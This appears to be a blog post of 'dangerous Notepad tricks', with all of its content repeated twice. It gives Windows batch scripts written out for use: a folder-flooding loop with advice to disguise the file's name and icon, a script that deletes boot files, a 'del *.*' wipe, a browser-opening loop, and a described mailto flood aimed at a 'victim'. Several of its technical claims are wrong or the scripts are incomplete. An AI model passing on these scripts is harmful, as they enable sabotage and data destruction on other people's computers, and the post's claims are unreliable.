SOME DANGEROUS AND DEADLY NOTEPAD TRICKS
SOME DANGEROUS AND DEADLY NOTEPAD TRICKS
[CAUTION]
DO NOT TRY THESE FOR FUN
1. How to create more than 3000 folders under a minute
1) Open your notepad and type the following code....
@echo off
:top
md %random%
goto top
2) Save it as 1000.bat OR any other name but the extension must be .bat
@echo off makes your screen appear blank but it is actually making hundreds of folders.
md %random% is command that creating folder with random names.(md is command to make directory in ms dos)
goto top - return the command to :top, causes an infinite loop .
NOTE: The folder will get created in the directory where you saved the 1000.bat file...You can change the file name and icon so it can not be look suspicious.
------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------
2. How to shutdown a computer forever.....!!!!
Now please don't try this because this is the most simplest and deadliest hack for your windws computer.
Copy the following...
Code in your notepad..
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
save it as shutdown.batt OR any other name but the extension must be .bat or .cmd
DON'T RUN THE BATCH FILE,YOU WONT RECOVER BACK AFTER YOU RUN IT!!!!
This should shut down the person's computer once nad after that it deletes the files which requires to reboot and restart.......
------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------
3.How to delete all your system
It deletes all the file on your system with a small command!!!
copy the following command in your notepad and save it as a .bat extension!!!!!!
del*.*
It deletes all your files on HDD in less than 5 Minutes........
------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------
4.RAM crashing Trick....
Open notepad and type
:A
start http://castleofdownloads.blogspot.in/
------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------
5. Crash a computer system with Nothing but a link
This is a Java Script "exploit" , it will hang/crash your system.It basically floods you with an infinite loop of mailto:xxx windows.To cancel this (and you have to move fast) kill the process of your Email client before you run out of RAM. Every instance occupies about 1000 bytes, if your victim is smart,he better end the process as soon as possible or he will forced to reboot his computer.
WARNING THIS LINK WILL CRASH YOUR BROWSER OR WORSE,YOUR COMPUTER!!!!
CLICK HERE
------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------
NOTE: try at your own risk
WE ARE NOT RESPONSIBLE FOR ANY LOSS CAUSED
ENJOY!!!!
[CAUTION]
DO NOT TRY THESE FOR FUN
1. How to create more than 3000 folders under a minute
1) Open your notepad and type the following code....
@echo off
:top
md %random%
goto top
2) Save it as 1000.bat OR any other name but the extension must be .bat
@echo off makes your screen appear blank but it is actually making hundreds of folders.
md %random% is command that creating folder with random names.(md is command to make directory in ms dos)
goto top - return the command to :top, causes an infinite loop .
NOTE: The folder will get created in the directory where you saved the 1000.bat file...You can change the file name and icon so it can not be look suspicious.
------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------
2. How to shutdown a computer forever.....!!!!
Now please don't try this because this is the most simplest and deadliest hack for your windws computer.
Copy the following...
Code in your notepad..
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
save it as shutdown.batt OR any other name but the extension must be .bat or .cmd
DON'T RUN THE BATCH FILE,YOU WONT RECOVER BACK AFTER YOU RUN IT!!!!
This should shut down the person's computer once nad after that it deletes the files which requires to reboot and restart.......
------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------
3.How to delete all your system
It deletes all the file on your system with a small command!!!
copy the following command in your notepad and save it as a .bat extension!!!!!!
del*.*
It deletes all your files on HDD in less than 5 Minutes........
------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------
4.RAM crashing Trick....
Open notepad and type
:A
start http://castleofdownloads.blogspot.in/
------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------
5. Crash a computer system with Nothing but a link
This is a Java Script "exploit" , it will hang/crash your system.It basically floods you with an infinite loop of mailto:xxx windows.To cancel this (and you have to move fast) kill the process of your Email client before you run out of RAM. Every instance occupies about 1000 bytes, if your victim is smart,he better end the process as soon as possible or he will forced to reboot his computer.
WARNING THIS LINK WILL CRASH YOUR BROWSER OR WORSE,YOUR COMPUTER!!!!
CLICK HERE
------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------
NOTE: try at your own risk
WE ARE NOT RESPONSIBLE FOR ANY LOSS CAUSED
ENJOY!!!!